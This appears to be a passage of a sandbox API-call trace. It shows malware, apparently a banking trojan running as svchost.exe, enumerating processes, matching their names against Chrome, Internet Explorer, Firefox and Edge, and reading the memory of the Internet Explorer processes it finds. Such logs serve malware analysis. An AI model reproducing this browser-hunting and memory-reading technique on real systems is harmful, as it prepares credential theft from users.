	[0194.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.492] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.492] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0194.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.493] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.493] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0194.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xca4
	[0194.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.494] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0194.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.494] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.494] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0194.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.495] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.495] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0194.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xca8
	[0194.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.496] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0194.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.496] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.497] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0194.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.497] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.498] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0194.498] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xcac
	[0194.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.498] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0194.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.499] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.499] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0194.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.499] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.499] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0194.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xcb0
	[0194.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.500] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0194.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.500] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.501] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0194.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.501] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.501] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0194.502] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xcb4
	[0194.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.502] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0194.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.502] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.503] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0194.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.503] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.504] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0194.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xcb8
	[0194.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.504] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0194.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.505] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.506] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0194.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.506] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.507] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0194.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xcbc
	[0194.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.507] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0194.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.508] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.508] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0194.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.509] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.509] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0194.510] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xcc0
	[0194.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.510] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0194.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.510] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.511] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0194.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.512] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.512] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0194.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xcc4
	[0194.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.513] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0194.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.513] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.514] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0194.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.514] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.515] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0194.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xcc8
	[0194.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.515] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0194.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.516] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0194.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.516] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0194.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.516] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.516] NtQueryInformationProcess (in: ProcessHandle=0xcc8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0194.516] ReadProcessMemory (in: hProcess=0xcc8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0194.517] ReadProcessMemory (in: hProcess=0xcc8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0194.517] ReadProcessMemory (in: hProcess=0xcc8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0194.517] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0194.525] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0194.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xccc
	[0194.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.526] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0194.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.526] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0194.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.526] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0194.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.527] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.527] NtQueryInformationProcess (in: ProcessHandle=0xccc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0194.527] ReadProcessMemory (in: hProcess=0xccc, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0194.527] ReadProcessMemory (in: hProcess=0xccc, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0194.527] ReadProcessMemory (in: hProcess=0xccc, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0194.527] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0194.527] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0194.528] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xcd0
	[0194.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.528] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0194.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.528] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.529] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0194.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.529] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.529] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0194.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xcd4
	[0194.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.530] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0194.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.530] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.531] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0194.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.531] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.531] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xcd8
	[0194.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.532] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.532] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.533] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.533] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.533] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.534] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0194.535] CloseHandle (hObject=0x188) returned 1
	[0194.535] Sleep (dwMilliseconds=0x64) 
	[0194.643] GetCurrentProcessId () returned 0x110
	[0194.643] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0194.649] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0194.650] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0194.651] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0194.651] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xcdc
	[0194.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.652] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0194.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.652] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.652] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0194.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.653] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.653] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0194.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xce0
	[0194.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.654] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0194.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.654] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.655] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0194.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.655] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.655] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0194.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xce4
	[0194.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.656] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0194.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.657] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.657] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0194.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.658] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.658] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0194.659] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xce8
	[0194.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.659] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0194.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.659] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.660] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0194.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.660] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.660] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0194.661] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xcec
	[0194.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.661] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0194.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.662] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.662] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0194.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.662] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.662] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0194.663] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xcf0
	[0194.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.663] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0194.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.663] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.664] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0194.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.664] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.664] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0194.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xcf4
	[0194.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.665] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0194.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.666] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.666] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0194.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.666] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
